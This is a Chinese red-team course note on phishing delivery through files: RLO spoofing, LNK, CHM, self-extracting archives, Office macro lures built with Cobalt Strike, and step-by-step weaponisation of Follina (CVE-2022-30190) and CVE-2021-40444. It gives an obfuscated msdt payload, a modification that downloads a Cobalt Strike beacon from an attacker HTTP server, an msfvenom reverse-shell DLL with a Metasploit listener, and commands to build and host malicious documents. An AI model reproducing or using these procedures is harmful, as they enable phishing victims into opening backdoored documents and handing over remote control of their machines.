红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书
➢ 红队APT-文件后缀-钓鱼伪装-RLO
➢ 红队APT-电子书-CHM-加载JS&PS
➢ 红队APT-快捷方式-LNK-加载&HTA
➢ 红队APT-压缩文件-自解压-释放执行
➢ 红队APT-捆绑文件-打包加载-释放执行
#红队APT-文档钓鱼-Office宏利用
1、生成:
Attacks --> Packages --> MS offices Macro
2、操作:
Office格式文档文件钓鱼一般采用宏或对象触发后门;
默认Office加载宏后一般需要启用内容才可调用执行;
所以诱惑伪装很重要,具体制作见操作:
3、伪装:
提示需要启用内容才能查看文件内容,并设置限制编辑等
总共有十二种方式
-文件内容模式
docx-doc&docm
xlsx-xls&xlsm
pptx-ppt&pptm
老版本:97-2003 0ffice默认是支持宏代码运行
新版本:启动宏的格式,一般就是在后缀加上M
-文件模版模式
模版-启动模版宏
dotx-dot dotm
potx-pot potm
xlst-xlt xltm
#红队APT-文档钓鱼-Office漏洞CVE
-Microsoft MSDT CVE-2022-30190 代码执行
https://github.com/JohnHammond/msdt-follina
该漏洞首次发现在2022年5月27日,由白俄罗斯的一个IP地址上传。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,
通过ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用程序msdt.exe,该程序用于运行各种疑难解答程序包。
此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。
目前已知影响的版本为:
office 2021 Lts
office 2019
office 2016
Office 2013
Office ProPlus
Office 365
测试:
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
复现上线CS:
https://github.com/chvancooten/follina.py
https://github.com/JohnHammond/msdt-follina
1、生成CS后门&启动HTTP
python -m http.server 8080
2、修改follina.py下载
command = f"""Invoke-WebRequest http://192.168.1.3:8080/cs.exe?raw=true
3、生成docx&打开docx
d:\Python3.8\python.exe follina.py -i 192.168.1.3 -p 8000 -r 5555
-Microsoft MSHTML CVE-2021-40444 远程代码执行
https://github.com/lockedbyte/CVE-2021-40444
影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本
1、安装依赖:
apt-get install lcab
2、生成DLL:
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=9999 -f dll > shell.dll
3、监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9999
run
4、生成文档:
cp shell.dll CVE-2021-40444
cd CVE-2021-40444
python3 exploit.py generate shell.dll http://47.94.236.117:10000
5、监听文档:
python3 exploit.py host 10000
6、取出文档执行测试
-CVE-2023-21716
https://mp.weixin.qq.com/s/lrNV3QM36eeHN2hl4RNfIw
-CVE-2024-30104
https://mp.weixin.qq.com/s/SaJgKgQvmqS00KeT4c2Kjg
-CVE-2017-11882
影响版本:
office 2003 office 2007 office 2010 office 2013 office 2016
-WPS(QVD-2023-17241)
本期课程第80和84天内容讲解
#应用WPS-HW2023-RCE执行&复现&上线CS
WPS Office 代码执行(QVD-2023-17241)
WPS Office 2023个人版<11.1.0.15120
WPS Office 2019企业版<11.8.2.12085
